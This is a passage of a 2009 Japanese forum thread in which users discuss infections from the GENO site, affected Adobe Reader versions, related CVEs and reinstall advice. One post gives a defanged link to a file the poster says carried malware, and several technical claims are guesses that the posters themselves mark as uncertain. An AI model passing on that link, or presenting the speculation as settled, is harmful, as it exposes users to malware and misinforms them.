とにかく、疑わしい場合は手間を惜しまずに可及的速やかにクリーンインストールかリカバリを行うべき。絶対に。
619 :名無しさん@お腹いっぱい。:2009/04/09(木) 22:10:22
まとめるとこういう事だな
http://kissho.xii.jp/1/src/1jyou71112.html
http://kissho.xii.jp/1/src/1jyou71112.html
620 :名無しさん@お腹いっぱい。:2009/04/09(木) 22:12:29
>>618
ジャバスクリプト切ってても感染するの?
ジャバスクリプト切ってても感染するの?
621 :名無しさん@お腹いっぱい。:2009/04/09(木) 22:14:51
不安なら>>191にある方法試してみたら?
622 :名無しさん@お腹いっぱい。:2009/04/09(木) 22:15:03
>>618
俺は? ねえ俺は?
俺は? ねえ俺は?
623 : ◆W07s5cWHb. :2009/04/09(木) 22:15:27
624 : ◆W07s5cWHb. :2009/04/09(木) 22:16:51
>>622
めんどいからぼるおっさんにでも聞いて来い。
ぼるじょあ(・3・)質問箱 セキュ板出張所27
http://pc11.2ch.net/test/read.cgi/sec/1233144146/
めんどいからぼるおっさんにでも聞いて来い。
ぼるじょあ(・3・)質問箱 セキュ板出張所27
http://pc11.2ch.net/test/read.cgi/sec/1233144146/
625 :名無しさん@お腹いっぱい。:2009/04/09(木) 22:18:44
>>623
書いてるだろうが
書いてるだろうが
626 :名無しさん@お腹いっぱい。:2009/04/09(木) 22:18:50
>>624
どうせ暇なんだから答えてやれ
どうせ暇なんだから答えてやれ
627 :名無しさん@お腹いっぱい。:2009/04/09(木) 22:19:33
628 :名無しさん@お腹いっぱい。:2009/04/09(木) 22:20:11
629 : ◆W07s5cWHb. :2009/04/09(木) 22:24:20
>>626
こー見えても桜花賞の展望を検討とか予想したりして何気に結構忙しかったりするw
こー見えても桜花賞の展望を検討とか予想したりして何気に結構忙しかったりするw
630 :名無しさん@お腹いっぱい。:2009/04/09(木) 22:25:11
(・3・) エェー バカになんてしてないYO!
631 :名無しさん@お腹いっぱい。:2009/04/09(木) 22:27:02
>>601のECスレの84なのですが、それを踏んだ時にkasperskey7.01.325を一時切ってました...
踏んだと同時にadobe readerの9.01へのupdateが起動kasperskeyの更新処理が同時に発動し、CPUが100%近くになり固まったため
電源落として強制的に終了
その後再起動しkasperskeyもオンにして再度踏んだら84だったワケですが、後でやった完全スキャンでは何も出ませんでした
>>336を見て
・再起動後regedit.exeは問題無く起動、cmdも同じく起動
・sqlsodbc.chmの値はここの>>84と同じf639afde02547603a3d3930ee4bf8c12(50,727 バイト)
・>>191のページは取り消されたアクションになるがダウンロードはできる
なら、取りあえず可能性は低いとみて良いでしょうか
踏んだと同時にadobe readerの9.01へのupdateが起動kasperskeyの更新処理が同時に発動し、CPUが100%近くになり固まったため
電源落として強制的に終了
その後再起動しkasperskeyもオンにして再度踏んだら84だったワケですが、後でやった完全スキャンでは何も出ませんでした
>>336を見て
・再起動後regedit.exeは問題無く起動、cmdも同じく起動
・sqlsodbc.chmの値はここの>>84と同じf639afde02547603a3d3930ee4bf8c12(50,727 バイト)
・>>191のページは取り消されたアクションになるがダウンロードはできる
なら、取りあえず可能性は低いとみて良いでしょうか
632 :名無しさん@お腹いっぱい。:2009/04/09(木) 22:28:23
633 :名無しさん@お腹いっぱい。:2009/04/09(木) 22:29:57
自分のブログにここのまとめ書いていいのかな…
634 :名無しさん@お腹いっぱい。:2009/04/09(木) 22:30:14
nod32は?
635 :名無しさん@お腹いっぱい。:2009/04/09(木) 22:30:32
636 :名無しさん@お腹いっぱい。:2009/04/09(木) 22:34:11
>>631
限りなく怪しい
限りなく怪しい
637 :名無しさん@お腹いっぱい。:2009/04/09(木) 22:35:00
>>631
adobe readerとflashのバージョンは?
adobe readerとflashのバージョンは?
638 :名無しさん@お腹いっぱい。:2009/04/09(木) 22:36:00
639 :名無しさん@お腹いっぱい。:2009/04/09(木) 22:36:46
640 :名無しさん@お腹いっぱい。:2009/04/09(木) 22:38:22
641 :名無しさん@お腹いっぱい。:2009/04/09(木) 22:38:46
>>633
知識がない奴が間違ってGENO踏まないような配慮すりゃいいんじゃない
知識がない奴が間違ってGENO踏まないような配慮すりゃいいんじゃない
642 :640:2009/04/09(木) 22:39:23
643 :名無しさん@お腹いっぱい。:2009/04/09(木) 22:39:48
>>631
>>637次第でかなり絞られる
感染例のあるバージョンだと
どう潜んでるかわからんから安全かどうかなんて誰もわからんよ
セキュ板住民ですらお手上げでJPCERT/CCの回答待ちなんだから…
>>637次第でかなり絞られる
感染例のあるバージョンだと
どう潜んでるかわからんから安全かどうかなんて誰もわからんよ
セキュ板住民ですらお手上げでJPCERT/CCの回答待ちなんだから…
644 : ◆W07s5cWHb. :2009/04/09(木) 22:39:49
>>631
感染の可能性が高い低いって観点で考えないで、↓の様に考えた方がいいと思う。
・ウィルスを踏んだ恐れがあるPC内に個人情報や消されたり外部に流出しても痛くも痒くもない物しか入っていないのなら、
そのまま使い続けても構わない。
・そのPCで定常的にネットバンキングの残高照会をしたり、競馬のPAT投票をしたり、
アマゾンやその他のネット通販でカード番号を入力したりする事がある場合は、
面倒がらずにとっとと再インストールかリカバリをする。
感染の可能性が高い低いって観点で考えないで、↓の様に考えた方がいいと思う。
・ウィルスを踏んだ恐れがあるPC内に個人情報や消されたり外部に流出しても痛くも痒くもない物しか入っていないのなら、
そのまま使い続けても構わない。
・そのPCで定常的にネットバンキングの残高照会をしたり、競馬のPAT投票をしたり、
アマゾンやその他のネット通販でカード番号を入力したりする事がある場合は、
面倒がらずにとっとと再インストールかリカバリをする。
645 :名無しさん@お腹いっぱい。:2009/04/09(木) 22:40:04
FOXが何らかの対処とればいいんだが宝くじを当てるぐらいの確率でやらないなw
646 :名無しさん@お腹いっぱい。:2009/04/09(木) 22:41:30
647 :633:2009/04/09(木) 22:43:56
>>639
ニュースにもなってるし被害拡大しない為にも
書いてみるかな…
>>641
それだけだと自分が感染してるか心配な人が検索しまくって
間違ってGENOにいっちゃうとかありえそうでな〜
2chを見るのに抵抗がある人もいるし
つーことで簡単に自分なりにまとめて書いてみます。
ニュースにもなってるし被害拡大しない為にも
書いてみるかな…
>>641
それだけだと自分が感染してるか心配な人が検索しまくって
間違ってGENOにいっちゃうとかありえそうでな〜
2chを見るのに抵抗がある人もいるし
つーことで簡単に自分なりにまとめて書いてみます。
648 :名無しさん@お腹いっぱい。:2009/04/09(木) 22:45:58
>>644
botnetに組み込まれて犯罪のお手伝いをする可能性はあるからクリーンインストール推奨
botnetに組み込まれて犯罪のお手伝いをする可能性はあるからクリーンインストール推奨
649 : ◆W07s5cWHb. :2009/04/09(木) 22:48:50
そうですね今は不確定な情報の状態だから「確実」はないので入れ直した方がいいですね
再インストールを考えた場合、こういった感染というものはC:以外にもするのでしょうか
一つのHDDをCとかDとか分割して使用してる場合や、HDDが複数ある場合も
全て感染を疑うべきものなのでしょうか?
C:だけをリカバリすれば済むものなのでしょうか
再インストールを考えた場合、こういった感染というものはC:以外にもするのでしょうか
一つのHDDをCとかDとか分割して使用してる場合や、HDDが複数ある場合も
全て感染を疑うべきものなのでしょうか?
C:だけをリカバリすれば済むものなのでしょうか
651 :名無しさん@お腹いっぱい。:2009/04/09(木) 22:50:28
絶対やだ><
652 :名無しさん@お腹いっぱい。:2009/04/09(木) 22:50:44
>>647
このURLは絶対踏んじゃダメリストを作って、検索エンジン使う際は
上記URLと検索結果のURLを確認すること、悪意を持って転送トラップを
仕掛けてる人が居るから怪しいURLは踏まないこととか
しっかり書いておくしかないんじゃね?
このURLは絶対踏んじゃダメリストを作って、検索エンジン使う際は
上記URLと検索結果のURLを確認すること、悪意を持って転送トラップを
仕掛けてる人が居るから怪しいURLは踏まないこととか
しっかり書いておくしかないんじゃね?
653 :名無しさん@お腹いっぱい。:2009/04/09(木) 22:52:57
2chの人達がひたすらあれから調べているのに
未だに本体が分からないって凄いな
やはり書き換えの実行した後消すような感じかな
未だに本体が分からないって凄いな
やはり書き換えの実行した後消すような感じかな
654 :名無しさん@お腹いっぱい。:2009/04/09(木) 22:57:00
これまだガキでよくわからんのだけどこういうののプロになりたい
名に目指せばいいの?
名に目指せばいいの?
655 :名無しさん@お腹いっぱい。:2009/04/09(木) 22:57:51
てっぺん
656 :名無しさん@お腹いっぱい。:2009/04/09(木) 23:01:35
げっげっ げげGENOげー♪
で替え歌作ってくれ。
で替え歌作ってくれ。
657 :名無しさん@お腹いっぱい。:2009/04/09(木) 23:02:10
しょうもな
658 : ◆W07s5cWHb. :2009/04/09(木) 23:03:06
>>650
現状ではまだウィルスが具体的にどんなデータを盗み出したりする等の詳細すら判明していない状況なので、
正直誰にも「このPCは安全」と断定する事は出来ない状況です。
とにかく、面倒だというのは承知の上で言ってるんだけど、再インストールやリカバリを行うべきです。
ちなみにリカバリ方法に関しても、まだノウハウが完全に纏まっている状況ですらないです。
確実にウィルスとおさらばしたいのなら必要なファイルだけをピンポイントで抜き取って、
メーラ等のデータもメーラが正常に起動するのであればメーラ内からエクスポートして
エクスポートしたデータのみを別のPCやCD/DVD-R等に焼いてバックアップを取るなんて方法が望ましいかと。
一応、このウィルスの今までに判っている挙動を見る限り
一般的なWindows環境の場合はDドライブ内にウィルスが入り込む事はほぼ無いと思うけど、
正直保障は出来ないレベル。
現状ではまだウィルスが具体的にどんなデータを盗み出したりする等の詳細すら判明していない状況なので、
正直誰にも「このPCは安全」と断定する事は出来ない状況です。
とにかく、面倒だというのは承知の上で言ってるんだけど、再インストールやリカバリを行うべきです。
ちなみにリカバリ方法に関しても、まだノウハウが完全に纏まっている状況ですらないです。
確実にウィルスとおさらばしたいのなら必要なファイルだけをピンポイントで抜き取って、
メーラ等のデータもメーラが正常に起動するのであればメーラ内からエクスポートして
エクスポートしたデータのみを別のPCやCD/DVD-R等に焼いてバックアップを取るなんて方法が望ましいかと。
一応、このウィルスの今までに判っている挙動を見る限り
一般的なWindows環境の場合はDドライブ内にウィルスが入り込む事はほぼ無いと思うけど、
正直保障は出来ないレベル。
659 :名無しさん@お腹いっぱい。:2009/04/09(木) 23:04:25
今年の最強ウィルス?
660 : ◆W07s5cWHb. :2009/04/09(木) 23:05:53
>>644をちょこっと訂正
・ウィルスを踏んだ恐れがあるPC内に個人情報を一切記録してなくて
データが消されたり外部に流出しても痛くも痒くもない物しか入ってなく、
その上で外部のクラッカー等からパソコンを踏み台にされてインターネット犯罪等に利用されても一向に構わないというのなら
そのまま使い続けても構わない。
・そのPCで定常的にネットバンキングの残高照会をしたり、競馬のPAT投票をしたり、
アマゾンやその他のネット通販等でカード番号を入力したり、
他人に知られたら恥ずかしくて生きていけなくなる様な自分のブログにログインして記事を書いたりする事がある場合は、
面倒がらずにとっとと再インストールかリカバリをする。
・ウィルスを踏んだ恐れがあるPC内に個人情報を一切記録してなくて
データが消されたり外部に流出しても痛くも痒くもない物しか入ってなく、
その上で外部のクラッカー等からパソコンを踏み台にされてインターネット犯罪等に利用されても一向に構わないというのなら
そのまま使い続けても構わない。
・そのPCで定常的にネットバンキングの残高照会をしたり、競馬のPAT投票をしたり、
アマゾンやその他のネット通販等でカード番号を入力したり、
他人に知られたら恥ずかしくて生きていけなくなる様な自分のブログにログインして記事を書いたりする事がある場合は、
面倒がらずにとっとと再インストールかリカバリをする。
>>618
d
おそらくそのころGENOサイトは改竄されていたんでしょうけど・・・
トップにアクセスしたらしばらく表示したあと、メモリ使用量があがり、ブラウザが落ちる
って状態でした。
インスコがよさげですね。
d
おそらくそのころGENOサイトは改竄されていたんでしょうけど・・・
トップにアクセスしたらしばらく表示したあと、メモリ使用量があがり、ブラウザが落ちる
って状態でした。
インスコがよさげですね。
662 : ◆W07s5cWHb. :2009/04/09(木) 23:07:50
663 :名無しさん@お腹いっぱい。:2009/04/09(木) 23:09:18
>>662
ざまあ
ざまあ
664 :名無しさん@お腹いっぱい。:2009/04/09(木) 23:09:57
pdfのJavaScriptを読むと
Adobe Reader 8系8.1.2未満、7系7.1.0未満、6以下全て
→CVE-2007-5659
それ以外
→CVE-2008-2992
みたいな感じで脆弱性をついているように見える。
CVE-2008-2992は8系8.1.2以下に存在する脆弱性なので、まとめると
Adobe Reader 9.0/8.1.3/7.1.0以上
であればpdfによる感染は免れるように思うんだけど、
上に挙げたバージョンのAdobe Reader使ってて感染した例はあったっけ。
Adobe Reader 8系8.1.2未満、7系7.1.0未満、6以下全て
→CVE-2007-5659
それ以外
→CVE-2008-2992
みたいな感じで脆弱性をついているように見える。
CVE-2008-2992は8系8.1.2以下に存在する脆弱性なので、まとめると
Adobe Reader 9.0/8.1.3/7.1.0以上
であればpdfによる感染は免れるように思うんだけど、
上に挙げたバージョンのAdobe Reader使ってて感染した例はあったっけ。
665 :名無しさん@お腹いっぱい。:2009/04/09(木) 23:10:41
マイドキュメントの中身300GB全部削除されたら自殺するな。オレ。
666 :名無しさん@お腹いっぱい。:2009/04/09(木) 23:15:13
667 :名無しさん@お腹いっぱい。:2009/04/09(木) 23:15:31
>>664
8.1.3だったけど、readerの使用メモリが異常に増えたよ。
それ移行の挙動はreaderがアップデートしろって言うだけで
他に挙動不審な点はなかった。u.bat作成なし、sqlsodbc.chm改変なし
一応a-squadでいくつかウイルスは見つかったけど、
今回のものかどうかわかんないや。>>156に人も同じ感じだな
8.1.3だったけど、readerの使用メモリが異常に増えたよ。
それ移行の挙動はreaderがアップデートしろって言うだけで
他に挙動不審な点はなかった。u.bat作成なし、sqlsodbc.chm改変なし
一応a-squadでいくつかウイルスは見つかったけど、
今回のものかどうかわかんないや。>>156に人も同じ感じだな
668 :名無しさん@お腹いっぱい。:2009/04/09(木) 23:16:53
とりあえず、おいらは火狐のアドオンでAdobeReaderを無効化しておいた。
669 :名無しさん@お腹いっぱい。:2009/04/09(木) 23:17:39
670 :名無しさん@お腹いっぱい。:2009/04/09(木) 23:17:44
>>658
有り難うございましす、動画が1テラ以上あるので(noエロw)そういうのはどうなのかと思いまして
何とかやってみます
>>660
個人情報ありまくりですwC:にはありませんがrobotのpassたちが
皆様有り難うございました
有り難うございましす、動画が1テラ以上あるので(noエロw)そういうのはどうなのかと思いまして
何とかやってみます
>>660
個人情報ありまくりですwC:にはありませんがrobotのpassたちが
皆様有り難うございました
673 :名無しさん@お腹いっぱい。:2009/04/09(木) 23:19:18
勝手に無理なOCさせてBIOSぶっこわすウイルスなかったっけ
674 : ◆W07s5cWHb. :2009/04/09(木) 23:20:40
>>664
そこまで完全に把握出来てないんだけど、
確かν速のスレで9でも食らったと言ってた人がいた記憶がある。確約出来ないけど。
恐らく9.0を指していたと思うけど。
ちなみにν速の過去スレにて挙動実験をおこなってた人がいて、
その結果では8.X系に関しては
8.1.1以下でしかウィルスが動作せずに
8.1.2以上ではウィルスが動作しなかった様な事を報告していた人がいたと思う。
その点ではCVE-2008-2992の脆弱性と一致するね。
尚、その人からの7.X系や9.Xに関しての報告はあの時点では無かった筈。
もしかして貴方があの報告をしてくれた人なのかも知れないけどw
そこまで完全に把握出来てないんだけど、
確かν速のスレで9でも食らったと言ってた人がいた記憶がある。確約出来ないけど。
恐らく9.0を指していたと思うけど。
ちなみにν速の過去スレにて挙動実験をおこなってた人がいて、
その結果では8.X系に関しては
8.1.1以下でしかウィルスが動作せずに
8.1.2以上ではウィルスが動作しなかった様な事を報告していた人がいたと思う。
その点ではCVE-2008-2992の脆弱性と一致するね。
尚、その人からの7.X系や9.Xに関しての報告はあの時点では無かった筈。
もしかして貴方があの報告をしてくれた人なのかも知れないけどw
675 :名無しさん@お腹いっぱい。:2009/04/09(木) 23:20:39
俺も踏んだとき、ページファイル食わされただけだった
その後、確認されている感染現象は大抵チェックしたし、普段使っていておかしなところもない
ページファイルはウィルスというよりJavaScriptの問題なのかな?
ブラウザに異常があっても、感染していないケースがあってもいいと思いたい
最近クリーンインストールしていたので、リーダー、FlashPlayer、WindowsUpdateは多分最新
その後、確認されている感染現象は大抵チェックしたし、普段使っていておかしなところもない
ページファイルはウィルスというよりJavaScriptの問題なのかな?
ブラウザに異常があっても、感染していないケースがあってもいいと思いたい
最近クリーンインストールしていたので、リーダー、FlashPlayer、WindowsUpdateは多分最新
676 :名無しさん@お腹いっぱい。:2009/04/09(木) 23:21:09
>>659
ここ数年でも最凶レベルだと思う
このクラスのゼロデイアタックは滅多にないんじゃない?
ある程度のセキュリティ対策してる人でも余裕で感染するし
adobeのソフトウェアは入れてる人が多い割にはアップデートあんまりしない人が多いしな
ここ数年でも最凶レベルだと思う
このクラスのゼロデイアタックは滅多にないんじゃない?
ある程度のセキュリティ対策してる人でも余裕で感染するし
adobeのソフトウェアは入れてる人が多い割にはアップデートあんまりしない人が多いしな
677 : ◆W07s5cWHb. :2009/04/09(木) 23:22:12
678 :名無しさん@お腹いっぱい。:2009/04/09(木) 23:22:58
ゼロデイじゃないけどな。
しかしPDFが貼られていないページ参照でもPDFの脆弱性を突かれるとは盲点だった・・
しかしPDFが貼られていないページ参照でもPDFの脆弱性を突かれるとは盲点だった・・
680 : ◆W07s5cWHb. :2009/04/09(木) 23:25:15
>>669
ノートン先生もスルーして検体すら採取出来ずに終わった。
最終的にハングって再起動→ブルースクリーンのコンボを食らった。
ぶっちゃけ、セキュ板かソフトウェア板あたりのスレに張られていたリンクを踏んで食らったんですよ。
ノートン先生もスルーして検体すら採取出来ずに終わった。
最終的にハングって再起動→ブルースクリーンのコンボを食らった。
ぶっちゃけ、セキュ板かソフトウェア板あたりのスレに張られていたリンクを踏んで食らったんですよ。
681 :名無しさん@お腹いっぱい。:2009/04/09(木) 23:26:36
この件があってから Reader8から
Reader9.1にした
Reader9.1にした
683 :名無しさん@お腹いっぱい。:2009/04/09(木) 23:29:18
Adobe readerは9.1にアップデートしようとするとインストールモジュールが
70MB超なのがダルい。
この容量のせいでアップデート面倒くさがる人が多いんだろうなと思う(俺含め)
たかがReaderの分際で・・・
70MB超なのがダルい。
この容量のせいでアップデート面倒くさがる人が多いんだろうなと思う(俺含め)
たかがReaderの分際で・・・
684 :名無しさん@お腹いっぱい。:2009/04/09(木) 23:32:06
685 :名無しさん@お腹いっぱい。:2009/04/09(木) 23:32:46
そもそもpdfが重いから嫌い、って人多いしね
見れなきゃ困るから一応入れとくけど更新はしないor更新に気がつかない、ってのが大半な気がする
見れなきゃ困るから一応入れとくけど更新はしないor更新に気がつかない、ってのが大半な気がする
686 :名無しさん@お腹いっぱい。:2009/04/09(木) 23:34:30
今年に入って必死にスパム送りまくってロガーからftp手動で頑張って流行らそうとしてるktがいるんだろ
687 :名無しさん@お腹いっぱい。:2009/04/09(木) 23:34:51
>>682
恐らく、同じ脆弱性を突く別のものなんじゃないかね。
で、これは使えるwwwwって、ラトビアの人が改造してばら撒いたと。
まぁ、こんな感じだから、なんとかクリーンインストールを避けたくて
ここ見に来る人も、面倒臭がらずに入れ直した方が良いよ。
あれこれやって時間だけ食って、結局入れなおす羽目になるから。
しかし、Adobe ReaderとFlash Playerの脆弱性か。これは確かに
盲点だなぁ。WinUpdateと比べて自己主張しないし、実害ないだろって
自動アップデートも告知もOFFにしてる人多そうだ。
恐らく、同じ脆弱性を突く別のものなんじゃないかね。
で、これは使えるwwwwって、ラトビアの人が改造してばら撒いたと。
まぁ、こんな感じだから、なんとかクリーンインストールを避けたくて
ここ見に来る人も、面倒臭がらずに入れ直した方が良いよ。
あれこれやって時間だけ食って、結局入れなおす羽目になるから。
しかし、Adobe ReaderとFlash Playerの脆弱性か。これは確かに
盲点だなぁ。WinUpdateと比べて自己主張しないし、実害ないだろって
自動アップデートも告知もOFFにしてる人多そうだ。
688 :名無しさん@お腹いっぱい。:2009/04/09(木) 23:38:05
4月から会社のIT委員(IT部門のような専門家じゃない)になったら
いきなりウイルス騒動でてんてこまい。
GENOの話も今日知ったので、アドビのうpdateするようにいわなきゃ。
いきなりウイルス騒動でてんてこまい。
GENOの話も今日知ったので、アドビのうpdateするようにいわなきゃ。
>>666
>>667
>>674
flashの方の脆弱性をつかれてる可能性もあるから切り分けが難しいな…
ちなみにLinux上のFirefoxでも踏んだら落ちる。
メモリをバカ食いするのは、メモリを食いまくるようなコードになっているため。
sqlsodbc.chmの改変がないところを見ると>>664で正しいような気もするが…
もし他の感染例があったら報告頼む
>>667
>>674
flashの方の脆弱性をつかれてる可能性もあるから切り分けが難しいな…
ちなみにLinux上のFirefoxでも踏んだら落ちる。
メモリをバカ食いするのは、メモリを食いまくるようなコードになっているため。
sqlsodbc.chmの改変がないところを見ると>>664で正しいような気もするが…
もし他の感染例があったら報告頼む
690 :名無しさん@お腹いっぱい。:2009/04/09(木) 23:39:37
691 :名無しさん@お腹いっぱい。:2009/04/09(木) 23:40:39
携帯電話向けワームが出現,エフセキュアがマルウエア動向を発表
ttp://itpro.nikkeibp.co.jp/article/NEWS/20090409/328160/
ttp://itpro.nikkeibp.co.jp/article/NEWS/20090409/328160/
692 :名無しさん@お腹いっぱい。:2009/04/09(木) 23:44:42
このウィルスって、
メモリ馬鹿食いさせて、メモリ上のアプリを落とす。
再起動した時にメモリ上のexeを乗っ取って悪さをする。
La.exeや8lv.exe自体はウィルス的な挙動を行わず、
あくまでもメモリ上で乗っ取ったWindowsのexeで
ウィルス的な挙動をさせるってことだよね?
だから大元のファイルを特定できず、アンチウィルスソフトも
右往左往してるってことで合ってる?
メモリ馬鹿食いさせて、メモリ上のアプリを落とす。
再起動した時にメモリ上のexeを乗っ取って悪さをする。
La.exeや8lv.exe自体はウィルス的な挙動を行わず、
あくまでもメモリ上で乗っ取ったWindowsのexeで
ウィルス的な挙動をさせるってことだよね?
だから大元のファイルを特定できず、アンチウィルスソフトも
右往左往してるってことで合ってる?
693 : ◆W07s5cWHb. :2009/04/09(木) 23:51:23
>>669
ちなみにちょっと思い出したけど、
確か食らったのはソフトウェア板のPerfectDiskスレの現行の一つ前のスレ内のリンクだったと思う。
ギコナビのログも採取出来なかったんで、レス番等の詳細も追えない。
で、ウィルスの挙動に関しては正直今回のGenoウィルスに結構似てて、
Regeditやメモ帳等Windows標準アプリがジャックされて起動不能になって
ProcessExplorerで確認しつつ、いじくるツールでレジストリの起動系キーを確認してる間に
Document and Settings内のファイルがジャンジャン消されてハング。
マイドキュメント内のデータが少なかった事が仇となった様で即効でハングした。
ちなみにちょっと思い出したけど、
確か食らったのはソフトウェア板のPerfectDiskスレの現行の一つ前のスレ内のリンクだったと思う。
ギコナビのログも採取出来なかったんで、レス番等の詳細も追えない。
で、ウィルスの挙動に関しては正直今回のGenoウィルスに結構似てて、
Regeditやメモ帳等Windows標準アプリがジャックされて起動不能になって
ProcessExplorerで確認しつつ、いじくるツールでレジストリの起動系キーを確認してる間に
Document and Settings内のファイルがジャンジャン消されてハング。
マイドキュメント内のデータが少なかった事が仇となった様で即効でハングした。
694 :名無しさん@お腹いっぱい。:2009/04/09(木) 23:52:16
ウィルス本体よりも、むしろこれほどまでのウィルスを製作した奴がどんな人間なのか知りたい
まさか元Adobe社員のプログラマとかないだろうな
まさか元Adobe社員のプログラマとかないだろうな
695 :名無しさん@お腹いっぱい。:2009/04/09(木) 23:53:07
+から飛来したか
696 : ◆W07s5cWHb. :2009/04/09(木) 23:53:26
あ、あと、おいらが食らったウィルスはタスクマネージャーもジャックして起動出来なかったわ。
参考までに報告。
参考までに報告。
697 :名無しさん@お腹いっぱい。:2009/04/09(木) 23:53:30
最強のウィルスってのは人知れずコソーリ活動するものじゃないのか?
698 :名無しさん@お腹いっぱい。:2009/04/10(金) 00:00:15
>>693
システム破壊系のウイルスなんて過去に腐るほどあるだろ・・・
システム破壊系のウイルスなんて過去に腐るほどあるだろ・・・
699 :名無しさん@お腹いっぱい。:2009/04/10(金) 00:02:05
700 :名無しさん@お腹いっぱい。:2009/04/10(金) 00:02:21
そもそもウイルスに最強とかないだろw
701 :名無しさん@お腹いっぱい。:2009/04/10(金) 00:02:46
むしろ最近キンタマ、オンゲの垢抜きとかいうように多様化しただけで
昔はウイルス=破壊というようなイメージしかなかった
昔はウイルス=破壊というようなイメージしかなかった
702 :名無しさん@お腹いっぱい。:2009/04/10(金) 00:04:17
703 :名無しさん@お腹いっぱい。:2009/04/10(金) 00:05:51
>>700
そういうのを格付けしたくなる年頃なんだろ
そういうのを格付けしたくなる年頃なんだろ
704 : ◆W07s5cWHb. :2009/04/10(金) 00:07:12
>>698
昔からある典型的なタイプだけど、恐らく一部バイナリ改変して
当時のノートン先生等をクリアしちゃう様にしてた物を踏んだんだと思う。
どうせ検出されるだろうと高をくくって踏んだら食らっちゃいましたってお話。
ノートン先生を過信しすぎてたw
昔からある典型的なタイプだけど、恐らく一部バイナリ改変して
当時のノートン先生等をクリアしちゃう様にしてた物を踏んだんだと思う。
どうせ検出されるだろうと高をくくって踏んだら食らっちゃいましたってお話。
ノートン先生を過信しすぎてたw
705 :名無しさん@お腹いっぱい。:2009/04/10(金) 00:09:39
>>702
普通にクラッカーってどこで知識つけるか知りたいんだが
普通にクラッカーってどこで知識つけるか知りたいんだが
706 :名無しさん@お腹いっぱい。:2009/04/10(金) 00:11:23
>>705
子供は早く寝ようね
子供は早く寝ようね
707 :名無しさん@お腹いっぱい。:2009/04/10(金) 00:12:21
708 : ◆W07s5cWHb. :2009/04/10(金) 00:12:48
>>705
ナビスコのオレオを沢山食べると腕が上がるって言ってたよw
ナビスコのオレオを沢山食べると腕が上がるって言ってたよw
709 :名無しさん@お腹いっぱい。:2009/04/10(金) 00:13:27
ニコ動で動画再生するとCPU使用率が
50前後ぐらいいくんだけど元々、そんなもんかねぇ
50前後ぐらいいくんだけど元々、そんなもんかねぇ
710 :名無しさん@お腹いっぱい。:2009/04/10(金) 00:13:46
性質の悪いウイルスなら知ってるけど最強のウイルスはしらない
711 :名無しさん@お腹いっぱい。:2009/04/10(金) 00:13:50
(* >ω<)=3プー
712 :名無しさん@お腹いっぱい。:2009/04/10(金) 00:25:49
>>709
皆は君のCPUが何か知らないからエスパーに聞くといい。
皆は君のCPUが何か知らないからエスパーに聞くといい。
713 :名無しさん@お腹いっぱい。:2009/04/10(金) 00:28:39
>>712
dualcoreの2Gです
dualcoreの2Gです
>>713
>>709は私だ(* >ω<)=3プー
>>712
あぁ、やっぱりそうですよね、すみません
x86 Family 15 Model 79 Stepping 1 AuthenticAMD ~2204 Mhz
これがCPUでしょうか?
合計物理メモリってのが 1,024,00MB
利用可能な物理メモリが354,19MB
合計仮想メモリ 2,00GB
こんな感じです
Readerは7系の最新だったけどflashが10.0.10〜ぐらいで最新でなく
楽天系のブログ見てて記事押しても
表示されない変なブログがあったのが気がかり
ハッシュは>>84と一緒なんですけど
>>709は私だ(* >ω<)=3プー
>>712
あぁ、やっぱりそうですよね、すみません
x86 Family 15 Model 79 Stepping 1 AuthenticAMD ~2204 Mhz
これがCPUでしょうか?
合計物理メモリってのが 1,024,00MB
利用可能な物理メモリが354,19MB
合計仮想メモリ 2,00GB
こんな感じです
Readerは7系の最新だったけどflashが10.0.10〜ぐらいで最新でなく
楽天系のブログ見てて記事押しても
表示されない変なブログがあったのが気がかり
ハッシュは>>84と一緒なんですけど
715 :名無しさん@お腹いっぱい。:2009/04/10(金) 00:38:28
716 :名無しさん@お腹いっぱい。:2009/04/10(金) 00:39:25
・・・・
717 :名無しさん@お腹いっぱい。:2009/04/10(金) 00:44:05
OS再インスコしとけ(* >ω<)=3プー
718 :名無しさん@お腹いっぱい。:2009/04/10(金) 00:46:54
( * > ω < ) = 3 フ ゚ ー
720 : ◆W07s5cWHb. :2009/04/10(金) 00:52:35
思い出した。ウィルス報告があったから
敢えて試しに下のを踏んで食らったんだったわw
【最適化】PerfectDisk Part11【デフラグ】
http://pc12.2ch.net/test/read.cgi/software/1235509378/7
ここのレスの下のリンクを踏んで食らった。
もうファイル消されていると思うけど、踏むなら自己責任で最悪再インスコを覚悟してね。
hxxp://www.btfree.info/file.php?action-get.html
敢えて試しに下のを踏んで食らったんだったわw
【最適化】PerfectDisk Part11【デフラグ】
http://pc12.2ch.net/test/read.cgi/software/1235509378/7
ここのレスの下のリンクを踏んで食らった。
もうファイル消されていると思うけど、踏むなら自己責任で最悪再インスコを覚悟してね。
hxxp://www.btfree.info/file.php?action-get.html
もしも GENOウイルスが感染してるとして
問題なのはCドライブだけですかね?
パーティションきってるんですが他のドライブは・・
再インスコしたかたはどうしてますか?
問題なのはCドライブだけですかね?
パーティションきってるんですが他のドライブは・・
再インスコしたかたはどうしてますか?
722 :名無しさん@お腹いっぱい。:2009/04/10(金) 01:02:03
関係ないけど私のDELLもパーティションきってあるけど
DELL自体のシステム専用みたいなパーティションとかあって
素人だし意味がわかんないからサポに送ったよー
すっからかんになるみたいw
DELL自体のシステム専用みたいなパーティションとかあって
素人だし意味がわかんないからサポに送ったよー
すっからかんになるみたいw
723 : ◆W07s5cWHb. :2009/04/10(金) 01:27:28
>>721
あくまで一般論でしか言えないけど、可能であれば当然全部フォーマットしなおすべきだし、
可能であればパーティションも再度切りなおすべき。
また、RAIDを組んでてストライピングやミラーリングを行っている場合は
パーティションを切りなおす以前にRAIDボリュームまで新たに組みなおすべき。
基本的にBIOSから認識される順で、1台目のHDDにマスターブートレコードが保存されているんだけど
その部分にも感染するウィルスの場合だと本当に厄介で、
原則的にはパーティションから切りなおして全てのドライブをフォーマットする感じになる。
今の所判ってる範囲ではこのGenoウィルスはそこまでしないウィルスだとは思うし、
単純にXPのシステム復元から復帰出来た人もいる様なので、そこまで気にしなくても大丈夫だとは思うけどね。
それに最近はUSBメモリの普通のブートレコードにも感染するウィルスとか、色々ある位なんで、
本来、原理原則に則って完璧に対処するのであれば、2台目等の複数のHDDを搭載している場合も
可能な限り一通りパーティションを切りなおす所から始めたほうが良いかと。
基本的にパーティションを切りなおす事で正しいブートレコードに書き換えられるんで。
ただ、実際にはどうしても消せない秘蔵エロ動画等のデータがDドライブにある等、止むを得ない場合は
キーロガー等が最悪残ってしまう等のリスクを承知の上で
